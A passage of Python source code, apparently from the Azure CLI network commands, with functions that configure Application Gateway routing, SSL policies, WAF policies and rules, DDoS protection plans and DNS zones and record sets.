instance.match.body = match_body
if match_status_codes is not None:
instance.match.status_codes = match_status_codes
if port is not None:
instance.port = port
return parent
def create_ag_request_routing_rule(cmd, resource_group_name, application_gateway_name, item_name,
address_pool=None, http_settings=None, http_listener=None, redirect_config=None,
url_path_map=None, rule_type='Basic', no_wait=False, rewrite_rule_set=None,
priority=None):
ApplicationGatewayRequestRoutingRule, SubResource = cmd.get_models(
'ApplicationGatewayRequestRoutingRule', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
if not address_pool and not redirect_config:
address_pool = _get_default_id(ag, 'backend_address_pools', '--address-pool')
if not http_settings and not redirect_config:
http_settings = _get_default_id(ag, 'backend_http_settings_collection', '--http-settings')
if not http_listener:
http_listener = _get_default_id(ag, 'http_listeners', '--http-listener')
new_rule = ApplicationGatewayRequestRoutingRule(
name=item_name,
rule_type=rule_type,
priority=priority,
backend_address_pool=SubResource(id=address_pool) if address_pool else None,
backend_http_settings=SubResource(id=http_settings) if http_settings else None,
http_listener=SubResource(id=http_listener),
url_path_map=SubResource(id=url_path_map) if url_path_map else None)
if cmd.supported_api_version(min_api='2017-06-01'):
new_rule.redirect_configuration = SubResource(id=redirect_config) if redirect_config else None
rewrite_rule_set_name = next(key for key, value in locals().items() if id(value) == id(rewrite_rule_set))
if cmd.supported_api_version(parameter_name=rewrite_rule_set_name):
new_rule.rewrite_rule_set = SubResource(id=rewrite_rule_set) if rewrite_rule_set else None
upsert_to_collection(ag, 'request_routing_rules', new_rule, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_request_routing_rule(cmd, instance, parent, item_name, address_pool=None,
http_settings=None, http_listener=None, redirect_config=None, url_path_map=None,
rule_type=None, rewrite_rule_set=None, priority=None):
SubResource = cmd.get_models('SubResource')
if address_pool is not None:
instance.backend_address_pool = SubResource(id=address_pool)
if http_settings is not None:
instance.backend_http_settings = SubResource(id=http_settings)
if redirect_config is not None:
instance.redirect_configuration = SubResource(id=redirect_config)
if http_listener is not None:
instance.http_listener = SubResource(id=http_listener)
if url_path_map is not None:
instance.url_path_map = SubResource(id=url_path_map)
if rule_type is not None:
instance.rule_type = rule_type
if rewrite_rule_set is not None:
instance.rewrite_rule_set = SubResource(id=rewrite_rule_set)
with cmd.update_context(instance) as c:
c.set_param('priority', priority)
return parent
def create_ag_ssl_certificate(cmd, resource_group_name, application_gateway_name, item_name, cert_data=None,
cert_password=None, key_vault_secret_id=None, no_wait=False):
ApplicationGatewaySslCertificate = cmd.get_models('ApplicationGatewaySslCertificate')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
new_cert = ApplicationGatewaySslCertificate(
name=item_name, data=cert_data, password=cert_password, key_vault_secret_id=key_vault_secret_id)
upsert_to_collection(ag, 'ssl_certificates', new_cert, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_ssl_certificate(instance, parent, item_name,
cert_data=None, cert_password=None, key_vault_secret_id=None):
if cert_data is not None:
instance.data = cert_data
if cert_password is not None:
instance.password = cert_password
if key_vault_secret_id is not None:
instance.key_vault_secret_id = key_vault_secret_id
return parent
def set_ag_ssl_policy_2017_03_01(cmd, resource_group_name, application_gateway_name, disabled_ssl_protocols=None,
clear=False, no_wait=False):
ApplicationGatewaySslPolicy = cmd.get_models('ApplicationGatewaySslPolicy')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
ag.ssl_policy = None if clear else ApplicationGatewaySslPolicy(
disabled_ssl_protocols=disabled_ssl_protocols)
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def set_ag_ssl_policy_2017_06_01(cmd, resource_group_name, application_gateway_name, policy_name=None, policy_type=None,
disabled_ssl_protocols=None, cipher_suites=None, min_protocol_version=None,
no_wait=False):
ApplicationGatewaySslPolicy, ApplicationGatewaySslPolicyType = cmd.get_models(
'ApplicationGatewaySslPolicy', 'ApplicationGatewaySslPolicyType')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
policy_type = None
if policy_name:
policy_type = ApplicationGatewaySslPolicyType.predefined.value
elif cipher_suites or min_protocol_version:
policy_type = ApplicationGatewaySslPolicyType.custom.value
ag.ssl_policy = ApplicationGatewaySslPolicy(
policy_name=policy_name,
policy_type=policy_type,
disabled_ssl_protocols=disabled_ssl_protocols,
cipher_suites=cipher_suites,
min_protocol_version=min_protocol_version)
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def show_ag_ssl_policy(cmd, resource_group_name, application_gateway_name):
return network_client_factory(cmd.cli_ctx).application_gateways.get(
resource_group_name, application_gateway_name).ssl_policy
def create_ag_trusted_root_certificate(cmd, resource_group_name, application_gateway_name, item_name, no_wait=False,
cert_data=None, keyvault_secret=None):
ApplicationGatewayTrustedRootCertificate = cmd.get_models('ApplicationGatewayTrustedRootCertificate')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
root_cert = ApplicationGatewayTrustedRootCertificate(name=item_name, data=cert_data,
key_vault_secret_id=keyvault_secret)
upsert_to_collection(ag, 'trusted_root_certificates', root_cert, 'name')
return sdk_no_wait(no_wait, ncf.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_trusted_root_certificate(instance, parent, item_name, cert_data=None, keyvault_secret=None):
if cert_data is not None:
instance.data = cert_data
if keyvault_secret is not None:
instance.key_vault_secret_id = keyvault_secret
return parent
def create_ag_url_path_map(cmd, resource_group_name, application_gateway_name, item_name, paths,
address_pool=None, http_settings=None, redirect_config=None, rewrite_rule_set=None,
default_address_pool=None, default_http_settings=None, default_redirect_config=None,
no_wait=False, rule_name='default', default_rewrite_rule_set=None, firewall_policy=None):
ApplicationGatewayUrlPathMap, ApplicationGatewayPathRule, SubResource = cmd.get_models(
'ApplicationGatewayUrlPathMap', 'ApplicationGatewayPathRule', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
new_rule = ApplicationGatewayPathRule(
name=rule_name,
backend_address_pool=SubResource(id=address_pool) if address_pool else None,
backend_http_settings=SubResource(id=http_settings) if http_settings else None,
paths=paths
)
new_map = ApplicationGatewayUrlPathMap(
name=item_name,
default_backend_address_pool=SubResource(id=default_address_pool) if default_address_pool else None,
default_backend_http_settings=SubResource(id=default_http_settings) if default_http_settings else None,
path_rules=[])
if cmd.supported_api_version(min_api='2017-06-01'):
new_rule.redirect_configuration = SubResource(id=redirect_config) if redirect_config else None
new_map.default_redirect_configuration = \
SubResource(id=default_redirect_config) if default_redirect_config else None
rewrite_rule_set_name = next(key for key, value in locals().items() if id(value) == id(rewrite_rule_set))
if cmd.supported_api_version(parameter_name=rewrite_rule_set_name):
new_rule.rewrite_rule_set = SubResource(id=rewrite_rule_set) if rewrite_rule_set else None
new_map.default_rewrite_rule_set = \
SubResource(id=default_rewrite_rule_set) if default_rewrite_rule_set else None
if cmd.supported_api_version(min_api='2019-09-01'):
new_rule.firewall_policy = SubResource(id=firewall_policy) if firewall_policy else None
# pull defaults from the rule specific properties if the default-* option isn't specified
if new_rule.backend_address_pool and not new_map.default_backend_address_pool:
new_map.default_backend_address_pool = new_rule.backend_address_pool
if new_rule.backend_http_settings and not new_map.default_backend_http_settings:
new_map.default_backend_http_settings = new_rule.backend_http_settings
if new_rule.redirect_configuration and not new_map.default_redirect_configuration:
new_map.default_redirect_configuration = new_rule.redirect_configuration
new_map.path_rules.append(new_rule)
upsert_to_collection(ag, 'url_path_maps', new_map, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_url_path_map(cmd, instance, parent, item_name, default_address_pool=None,
default_http_settings=None, default_redirect_config=None, raw=False,
default_rewrite_rule_set=None):
SubResource = cmd.get_models('SubResource')
if default_address_pool == '':
instance.default_backend_address_pool = None
elif default_address_pool:
instance.default_backend_address_pool = SubResource(id=default_address_pool)
if default_http_settings == '':
instance.default_backend_http_settings = None
elif default_http_settings:
instance.default_backend_http_settings = SubResource(id=default_http_settings)
if default_redirect_config == '':
instance.default_redirect_configuration = None
elif default_redirect_config:
instance.default_redirect_configuration = SubResource(id=default_redirect_config)
if default_rewrite_rule_set == '':
instance.default_rewrite_rule_set = None
elif default_rewrite_rule_set:
instance.default_rewrite_rule_set = SubResource(id=default_rewrite_rule_set)
return parent
def create_ag_url_path_map_rule(cmd, resource_group_name, application_gateway_name, url_path_map_name,
item_name, paths, address_pool=None, http_settings=None, redirect_config=None,
firewall_policy=None, no_wait=False, rewrite_rule_set=None):
ApplicationGatewayPathRule, SubResource = cmd.get_models('ApplicationGatewayPathRule', 'SubResource')
if address_pool and redirect_config:
raise CLIError("Cannot reference a BackendAddressPool when Redirect Configuration is specified.")
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
url_map = next((x for x in ag.url_path_maps if x.name == url_path_map_name), None)
if not url_map:
raise CLIError('URL path map "{}" not found.'.format(url_path_map_name))
default_backend_pool = SubResource(id=url_map.default_backend_address_pool.id) \
if (url_map.default_backend_address_pool and not redirect_config) else None
default_http_settings = SubResource(id=url_map.default_backend_http_settings.id) \
if url_map.default_backend_http_settings else None
new_rule = ApplicationGatewayPathRule(
name=item_name,
paths=paths,
backend_address_pool=SubResource(id=address_pool) if address_pool else default_backend_pool,
backend_http_settings=SubResource(id=http_settings) if http_settings else default_http_settings)
if cmd.supported_api_version(min_api='2017-06-01'):
default_redirect = SubResource(id=url_map.default_redirect_configuration.id) \
if (url_map.default_redirect_configuration and not address_pool) else None
new_rule.redirect_configuration = SubResource(id=redirect_config) if redirect_config else default_redirect
rewrite_rule_set_name = next(key for key, value in locals().items() if id(value) == id(rewrite_rule_set))
if cmd.supported_api_version(parameter_name=rewrite_rule_set_name):
new_rule.rewrite_rule_set = SubResource(id=rewrite_rule_set) if rewrite_rule_set else None
if cmd.supported_api_version(min_api='2019-09-01'):
new_rule.firewall_policy = SubResource(id=firewall_policy) if firewall_policy else None
upsert_to_collection(url_map, 'path_rules', new_rule, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def delete_ag_url_path_map_rule(cmd, resource_group_name, application_gateway_name, url_path_map_name,
item_name, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
url_map = next((x for x in ag.url_path_maps if x.name == url_path_map_name), None)
if not url_map:
raise CLIError('URL path map "{}" not found.'.format(url_path_map_name))
url_map.path_rules = \
[x for x in url_map.path_rules if x.name.lower() != item_name.lower()]
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def set_ag_waf_config_2016_09_01(cmd, resource_group_name, application_gateway_name, enabled,
firewall_mode=None,
no_wait=False):
ApplicationGatewayWebApplicationFirewallConfiguration = cmd.get_models(
'ApplicationGatewayWebApplicationFirewallConfiguration')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
ag.web_application_firewall_configuration = \
ApplicationGatewayWebApplicationFirewallConfiguration(
enabled=(enabled == 'true'), firewall_mode=firewall_mode)
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def set_ag_waf_config_2017_03_01(cmd, resource_group_name, application_gateway_name, enabled,
firewall_mode=None,
rule_set_type='OWASP', rule_set_version=None,
disabled_rule_groups=None,
disabled_rules=None, no_wait=False,
request_body_check=None, max_request_body_size=None, file_upload_limit=None,
exclusions=None):
ApplicationGatewayWebApplicationFirewallConfiguration = cmd.get_models(
'ApplicationGatewayWebApplicationFirewallConfiguration')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
ag.web_application_firewall_configuration = \
ApplicationGatewayWebApplicationFirewallConfiguration(
enabled=(enabled == 'true'), firewall_mode=firewall_mode, rule_set_type=rule_set_type,
rule_set_version=rule_set_version)
if disabled_rule_groups or disabled_rules:
ApplicationGatewayFirewallDisabledRuleGroup = cmd.get_models('ApplicationGatewayFirewallDisabledRuleGroup')
disabled_groups = []
# disabled groups can be added directly
for group in disabled_rule_groups or []:
disabled_groups.append(ApplicationGatewayFirewallDisabledRuleGroup(rule_group_name=group))
def _flatten(collection, expand_property_fn):
for each in collection:
for value in expand_property_fn(each):
yield value
# for disabled rules, we have to look up the IDs
if disabled_rules:
results = list_ag_waf_rule_sets(ncf, _type=rule_set_type, version=rule_set_version, group='*')
for group in _flatten(results, lambda r: r.rule_groups):
disabled_group = ApplicationGatewayFirewallDisabledRuleGroup(
rule_group_name=group.rule_group_name, rules=[])
for rule in group.rules:
if str(rule.rule_id) in disabled_rules:
disabled_group.rules.append(rule.rule_id)
if disabled_group.rules:
disabled_groups.append(disabled_group)
ag.web_application_firewall_configuration.disabled_rule_groups = disabled_groups
if cmd.supported_api_version(min_api='2018-08-01'):
ag.web_application_firewall_configuration.request_body_check = request_body_check
ag.web_application_firewall_configuration.max_request_body_size_in_kb = max_request_body_size
ag.web_application_firewall_configuration.file_upload_limit_in_mb = file_upload_limit
ag.web_application_firewall_configuration.exclusions = exclusions
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def show_ag_waf_config(cmd, resource_group_name, application_gateway_name):
return network_client_factory(cmd.cli_ctx).application_gateways.get(
resource_group_name, application_gateway_name).web_application_firewall_configuration
def list_ag_waf_rule_sets(client, _type=None, version=None, group=None):
results = client.list_available_waf_rule_sets().value
filtered_results = []
# filter by rule set name or version
for rule_set in results:
if _type and _type.lower() != rule_set.rule_set_type.lower():
continue
if version and version.lower() != rule_set.rule_set_version.lower():
continue
filtered_groups = []
for rule_group in rule_set.rule_groups:
if not group:
rule_group.rules = None
filtered_groups.append(rule_group)
elif group.lower() == rule_group.rule_group_name.lower() or group == '*':
filtered_groups.append(rule_group)
if filtered_groups:
rule_set.rule_groups = filtered_groups
filtered_results.append(rule_set)
return filtered_results
# endregion
# region ApplicationGatewayWAFPolicy
def create_ag_waf_policy(cmd, client, resource_group_name, policy_name,
location=None, tags=None, rule_set_type='OWASP',
rule_set_version='3.0'):
WebApplicationFirewallPolicy, ManagedRulesDefinition, \
ManagedRuleSet = cmd.get_models('WebApplicationFirewallPolicy',
'ManagedRulesDefinition',
'ManagedRuleSet')
# https://docs.microsoft.com/en-us/azure/application-gateway/waf-overview
# mandatory default rule with empty rule sets
managed_rule_set = ManagedRuleSet(rule_set_type=rule_set_type, rule_set_version=rule_set_version)
managed_rule_definition = ManagedRulesDefinition(managed_rule_sets=[managed_rule_set])
waf_policy = WebApplicationFirewallPolicy(location=location, tags=tags, managed_rules=managed_rule_definition)
return client.create_or_update(resource_group_name, policy_name, waf_policy)
def update_ag_waf_policy(cmd, instance, tags=None):
with cmd.update_context(instance) as c:
c.set_param('tags', tags)
return instance
def list_ag_waf_policies(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'web_application_firewall_policies', resource_group_name)
# endregion
# region ApplicationGatewayWAFPolicyRules PolicySettings
def update_waf_policy_setting(cmd, instance,
state=None, mode=None,
max_request_body_size_in_kb=None, file_upload_limit_in_mb=None,
request_body_check=False):
if state is not None:
instance.policy_settings.state = state
if mode is not None:
instance.policy_settings.mode = mode
if max_request_body_size_in_kb is not None:
instance.policy_settings.max_request_body_size_in_kb = max_request_body_size_in_kb
if file_upload_limit_in_mb is not None:
instance.policy_settings.file_upload_limit_in_mb = file_upload_limit_in_mb
if request_body_check is not None:
instance.policy_settings.request_body_check = request_body_check
return instance
def list_waf_policy_setting(cmd, client, resource_group_name, policy_name):
return client.get(resource_group_name, policy_name).policy_settings
# endregion
# region ApplicationGatewayWAFPolicyRules
def create_waf_custom_rule(cmd, client, resource_group_name, policy_name, rule_name, priority, rule_type, action):
"""
Initialize custom rule for WAF policy
"""
WebApplicationFirewallCustomRule = cmd.get_models('WebApplicationFirewallCustomRule')
waf_policy = client.get(resource_group_name, policy_name)
new_custom_rule = WebApplicationFirewallCustomRule(
name=rule_name,
action=action,
match_conditions=[],
priority=priority,
rule_type=rule_type
)
upsert_to_collection(waf_policy, 'custom_rules', new_custom_rule, 'name')
parent = client.create_or_update(resource_group_name, policy_name, waf_policy)
return find_child_item(parent, rule_name, path='custom_rules', key_path='name')
# pylint: disable=unused-argument
def update_waf_custom_rule(instance, parent, cmd, rule_name, priority=None, rule_type=None, action=None):
with cmd.update_context(instance) as c:
c.set_param('priority', priority)
c.set_param('rule_type', rule_type)
c.set_param('action', action)
return parent
def show_waf_custom_rule(cmd, client, resource_group_name, policy_name, rule_name):
waf_policy = client.get(resource_group_name, policy_name)
return find_child_item(waf_policy, rule_name, path='custom_rules', key_path='name')
def list_waf_custom_rules(cmd, client, resource_group_name, policy_name):
return client.get(resource_group_name, policy_name).custom_rules
def delete_waf_custom_rule(cmd, client, resource_group_name, policy_name, rule_name, no_wait=None):
waf_policy = client.get(resource_group_name, policy_name)
rule = find_child_item(waf_policy, rule_name, path='custom_rules', key_path='name')
waf_policy.custom_rules.remove(rule)
sdk_no_wait(no_wait, client.create_or_update, resource_group_name, policy_name, waf_policy)
# endregion
# region ApplicationGatewayWAFPolicyRuleMatchConditions
def add_waf_custom_rule_match_cond(cmd, client, resource_group_name, policy_name, rule_name,
match_variables, operator, match_values, negation_condition=None, transforms=None):
MatchCondition = cmd.get_models('MatchCondition')
waf_policy = client.get(resource_group_name, policy_name)
custom_rule = find_child_item(waf_policy, rule_name, path='custom_rules', key_path='name')
new_cond = MatchCondition(
match_variables=match_variables,
operator=operator,
match_values=match_values,
negation_conditon=negation_condition,
transforms=transforms
)
custom_rule.match_conditions.append(new_cond)
upsert_to_collection(waf_policy, 'custom_rules', custom_rule, 'name', warn=False)
client.create_or_update(resource_group_name, policy_name, waf_policy)
return new_cond
def list_waf_custom_rule_match_cond(cmd, client, resource_group_name, policy_name, rule_name):
waf_policy = client.get(resource_group_name, policy_name)
return find_child_item(waf_policy, rule_name, path='custom_rules', key_path='name').match_conditions
def remove_waf_custom_rule_match_cond(cmd, client, resource_group_name, policy_name, rule_name, index):
waf_policy = client.get(resource_group_name, policy_name)
rule = find_child_item(waf_policy, rule_name, path='custom_rules', key_path='name')
rule.match_conditions.pop(index)
client.create_or_update(resource_group_name, policy_name, waf_policy)
# endregion
# region ApplicationGatewayWAFPolicy ManagedRule ManagedRuleSet
def add_waf_managed_rule_set(cmd, client, resource_group_name, policy_name,
rule_set_type, rule_set_version,
rule_group_name=None, rules=None):
"""
Add managed rule set to the WAF policy managed rules.
Visit: https://docs.microsoft.com/en-us/azure/web-application-firewall/ag/application-gateway-crs-rulegroups-rules
"""
ManagedRuleSet, ManagedRuleGroupOverride, ManagedRuleOverride = \
cmd.get_models('ManagedRuleSet', 'ManagedRuleGroupOverride', 'ManagedRuleOverride')
waf_policy = client.get(resource_group_name, policy_name)
managed_rule_overrides = [ManagedRuleOverride(rule_id=r) for r in rules] if rules is not None else []
rule_group_override = None
if rule_group_name is not None:
rule_group_override = ManagedRuleGroupOverride(rule_group_name=rule_group_name,
rules=managed_rule_overrides)
new_managed_rule_set = ManagedRuleSet(rule_set_type=rule_set_type,
rule_set_version=rule_set_version,
rule_group_overrides=[rule_group_override] if rule_group_override is not None else []) # pylint: disable=line-too-long
for rule_set in waf_policy.managed_rules.managed_rule_sets:
if rule_set.rule_set_type == rule_set_type and rule_set.rule_set_version == rule_set_version:
for rule_override in rule_set.rule_group_overrides:
if rule_override.rule_group_name == rule_group_name:
# Add one rule
rule_override.rules.extend(managed_rule_overrides)
break
else:
# Add one rule group
if rule_group_override is not None:
rule_set.rule_group_overrides.append(rule_group_override)
break
else:
# Add new rule set
waf_policy.managed_rules.managed_rule_sets.append(new_managed_rule_set)
return client.create_or_update(resource_group_name, policy_name, waf_policy)
def update_waf_managed_rule_set(cmd, instance, rule_set_type, rule_set_version, rule_group_name=None, rules=None):
"""
Update(Override) existing rule set of a WAF policy managed rules.
"""
ManagedRuleSet, ManagedRuleGroupOverride, ManagedRuleOverride = \
cmd.get_models('ManagedRuleSet', 'ManagedRuleGroupOverride', 'ManagedRuleOverride')
managed_rule_overrides = [ManagedRuleOverride(rule_id=r) for r in rules] if rules else None
rule_group_override = ManagedRuleGroupOverride(rule_group_name=rule_group_name,
rules=managed_rule_overrides) if managed_rule_overrides else None
new_managed_rule_set = ManagedRuleSet(rule_set_type=rule_set_type,
rule_set_version=rule_set_version,
rule_group_overrides=[rule_group_override] if rule_group_override is not None else []) # pylint: disable=line-too-long
updated_rule_set = None
for rule_set in instance.managed_rules.managed_rule_sets:
if rule_set.rule_set_type == rule_set_type and rule_set.rule_set_version != rule_set_version:
updated_rule_set = rule_set
break
if rule_set.rule_set_type == rule_set_type and rule_set.rule_set_version == rule_set_version:
if rule_group_name is None:
updated_rule_set = rule_set
break
rg = next((rg for rg in rule_set.rule_group_overrides if rg.rule_group_name == rule_group_name), None)
if rg:
rg.rules = managed_rule_overrides # differentiate with add_waf_managed_rule_set()
else:
rule_set.rule_group_overrides.append(rule_group_override)
if updated_rule_set:
instance.managed_rules.managed_rule_sets.remove(updated_rule_set)
instance.managed_rules.managed_rule_sets.append(new_managed_rule_set)
return instance
def remove_waf_managed_rule_set(cmd, client, resource_group_name, policy_name,
rule_set_type, rule_set_version, rule_group_name=None):
"""
Remove a managed rule set by rule set group name if rule_group_name is specified. Otherwise, remove all rule set.
"""
waf_policy = client.get(resource_group_name, policy_name)
delete_rule_set = None
for rule_set in waf_policy.managed_rules.managed_rule_sets:
if rule_set.rule_set_type == rule_set_type or rule_set.rule_set_version == rule_set_version:
if rule_group_name is None:
delete_rule_set = rule_set
break
# Remove one rule from rule group
rg = next((rg for rg in rule_set.rule_group_overrides if rg.rule_group_name == rule_group_name), None)
if rg is None:
raise CLIError('Rule set group [ {} ] not found.'.format(rule_group_name))
rule_set.rule_group_overrides.remove(rg)
if delete_rule_set:
waf_policy.managed_rules.managed_rule_sets.remove(delete_rule_set)
return client.create_or_update(resource_group_name, policy_name, waf_policy)
def list_waf_managed_rule_set(cmd, client, resource_group_name, policy_name):
waf_policy = client.get(resource_group_name, policy_name)
return waf_policy.managed_rules
# endregion
# region ApplicationGatewayWAFPolicy ManagedRule OwaspCrsExclusionEntry
def add_waf_managed_rule_exclusion(cmd, client, resource_group_name, policy_name,
match_variable, selector_match_operator, selector):
OwaspCrsExclusionEntry = cmd.get_models('OwaspCrsExclusionEntry')
exclusion_entry = OwaspCrsExclusionEntry(match_variable=match_variable,
selector_match_operator=selector_match_operator,
selector=selector)
waf_policy = client.get(resource_group_name, policy_name)
waf_policy.managed_rules.exclusions.append(exclusion_entry)
return client.create_or_update(resource_group_name, policy_name, waf_policy)
def remove_waf_managed_rule_exclusion(cmd, client, resource_group_name, policy_name):
waf_policy = client.get(resource_group_name, policy_name)
waf_policy.managed_rules.exclusions = []
return client.create_or_update(resource_group_name, policy_name, waf_policy)
def list_waf_managed_rule_exclusion(cmd, client, resource_group_name, policy_name):
waf_policy = client.get(resource_group_name, policy_name)
return waf_policy.managed_rules
# endregion
# region ApplicationSecurityGroups
def create_asg(cmd, client, resource_group_name, application_security_group_name, location=None, tags=None):
ApplicationSecurityGroup = cmd.get_models('ApplicationSecurityGroup')
asg = ApplicationSecurityGroup(location=location, tags=tags)
return client.begin_create_or_update(resource_group_name, application_security_group_name, asg)
def update_asg(instance, tags=None):
if tags is not None:
instance.tags = tags
return instance
# endregion
# region DdosProtectionPlans
def create_ddos_plan(cmd, resource_group_name, ddos_plan_name, location=None, tags=None, vnets=None):
from azure.cli.core.commands import LongRunningOperation
ddos_client = network_client_factory(cmd.cli_ctx).ddos_protection_plans
ddos_protection_plan = cmd.get_models('DdosProtectionPlan')()
if location:
ddos_protection_plan.location = location
if tags:
ddos_protection_plan.tags = tags
if not vnets:
# if no VNETs can do a simple PUT
return ddos_client.begin_create_or_update(resource_group_name, ddos_plan_name, parameters=ddos_protection_plan)
# if VNETs specified, have to create the protection plan and then add the VNETs
plan_id = LongRunningOperation(cmd.cli_ctx)(
ddos_client.begin_create_or_update(resource_group_name, ddos_plan_name, parameters=ddos_protection_plan)).id
SubResource = cmd.get_models('SubResource')
logger.info('Attempting to attach VNets to newly created DDoS protection plan.')
for vnet_subresource in vnets:
vnet_client = network_client_factory(cmd.cli_ctx).virtual_networks
id_parts = parse_resource_id(vnet_subresource.id)
vnet = vnet_client.get(id_parts['resource_group'], id_parts['name'])
vnet.ddos_protection_plan = SubResource(id=plan_id)
vnet_client.begin_create_or_update(id_parts['resource_group'], id_parts['name'], vnet)
return ddos_client.get(resource_group_name, ddos_plan_name)
def update_ddos_plan(cmd, instance, tags=None, vnets=None):
SubResource = cmd.get_models('SubResource')
if tags is not None:
instance.tags = tags
if vnets is not None:
logger.info('Attempting to update the VNets attached to the DDoS protection plan.')
vnet_ids = set([])
if len(vnets) == 1 and not vnets[0]:
pass
else:
vnet_ids = {x.id for x in vnets}
existing_vnet_ids = {x.id for x in instance.virtual_networks} if instance.virtual_networks else set([])
client = network_client_factory(cmd.cli_ctx).virtual_networks
for vnet_id in vnet_ids.difference(existing_vnet_ids):
logger.info("Adding VNet '%s' to plan.", vnet_id)
id_parts = parse_resource_id(vnet_id)
vnet = client.get(id_parts['resource_group'], id_parts['name'])
vnet.ddos_protection_plan = SubResource(id=instance.id)
client.begin_create_or_update(id_parts['resource_group'], id_parts['name'], vnet)
for vnet_id in existing_vnet_ids.difference(vnet_ids):
logger.info("Removing VNet '%s' from plan.", vnet_id)
id_parts = parse_resource_id(vnet_id)
vnet = client.get(id_parts['resource_group'], id_parts['name'])
vnet.ddos_protection_plan = None
client.begin_create_or_update(id_parts['resource_group'], id_parts['name'], vnet)
return instance
def list_ddos_plans(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).ddos_protection_plans
if resource_group_name:
return client.list_by_resource_group(resource_group_name)
return client.list()
# endregion
# region DNS Commands
# add delegation name server record for the created child zone in it's parent zone.
def add_dns_delegation(cmd, child_zone, parent_zone, child_rg, child_zone_name):
"""
:param child_zone: the zone object corresponding to the child that is created.
:param parent_zone: the parent zone name / FQDN of the parent zone.
if parent zone name is mentioned, assume current subscription and resource group.
:param child_rg: resource group of the child zone
:param child_zone_name: name of the child zone
"""
import sys
from azure.core.exceptions import HttpResponseError
parent_rg = child_rg
parent_subscription_id = None
parent_zone_name = parent_zone
if is_valid_resource_id(parent_zone):
id_parts = parse_resource_id(parent_zone)
parent_rg = id_parts['resource_group']
parent_subscription_id = id_parts['subscription']
parent_zone_name = id_parts['name']
if all([parent_zone_name, parent_rg, child_zone_name, child_zone]) and child_zone_name.endswith(parent_zone_name):
record_set_name = child_zone_name.replace('.' + parent_zone_name, '')
try:
for dname in child_zone.name_servers:
add_dns_ns_record(cmd, parent_rg, parent_zone_name, record_set_name, dname, parent_subscription_id)
print('Delegation added succesfully in \'{}\'\n'.format(parent_zone_name), file=sys.stderr)
except HttpResponseError as ex:
logger.error(ex)
print('Could not add delegation in \'{}\'\n'.format(parent_zone_name), file=sys.stderr)
def create_dns_zone(cmd, client, resource_group_name, zone_name, parent_zone_name=None, tags=None,
if_none_match=False, zone_type='Public', resolution_vnets=None, registration_vnets=None):
Zone = cmd.get_models('Zone', resource_type=ResourceType.MGMT_NETWORK_DNS)
zone = Zone(location='global', tags=tags)
if hasattr(zone, 'zone_type'):
zone.zone_type = zone_type
zone.registration_virtual_networks = registration_vnets
zone.resolution_virtual_networks = resolution_vnets
created_zone = client.create_or_update(resource_group_name, zone_name, zone,
if_none_match='*' if if_none_match else None)
if cmd.supported_api_version(min_api='2016-04-01') and parent_zone_name is not None:
logger.info('Attempting to add delegation in the parent zone')
add_dns_delegation(cmd, created_zone, parent_zone_name, resource_group_name, zone_name)
return created_zone
def update_dns_zone(instance, tags=None, zone_type=None, resolution_vnets=None, registration_vnets=None):
if tags is not None:
instance.tags = tags
if zone_type:
instance.zone_type = zone_type
if resolution_vnets == ['']:
instance.resolution_virtual_networks = None
elif resolution_vnets:
instance.resolution_virtual_networks = resolution_vnets
if registration_vnets == ['']:
instance.registration_virtual_networks = None
elif registration_vnets:
instance.registration_virtual_networks = registration_vnets
return instance
def list_dns_zones(cmd, resource_group_name=None):
ncf = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS).zones
if resource_group_name:
return ncf.list_by_resource_group(resource_group_name)
return ncf.list()
def create_dns_record_set(cmd, resource_group_name, zone_name, record_set_name, record_set_type,
metadata=None, if_match=None, if_none_match=None, ttl=3600, target_resource=None):
RecordSet = cmd.get_models('RecordSet', resource_type=ResourceType.MGMT_NETWORK_DNS)
SubResource = cmd.get_models('SubResource', resource_type=ResourceType.MGMT_NETWORK)
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS).record_sets
record_set = RecordSet(
ttl=ttl,
metadata=metadata,
target_resource=SubResource(id=target_resource) if target_resource else None
)
return client.create_or_update(resource_group_name, zone_name, record_set_name,
record_set_type, record_set, if_match=if_match,
if_none_match='*' if if_none_match else None)
def list_dns_record_set(client, resource_group_name, zone_name, record_type=None):
if record_type:
return client.list_by_type(resource_group_name, zone_name, record_type)
return client.list_by_dns_zone(resource_group_name, zone_name)
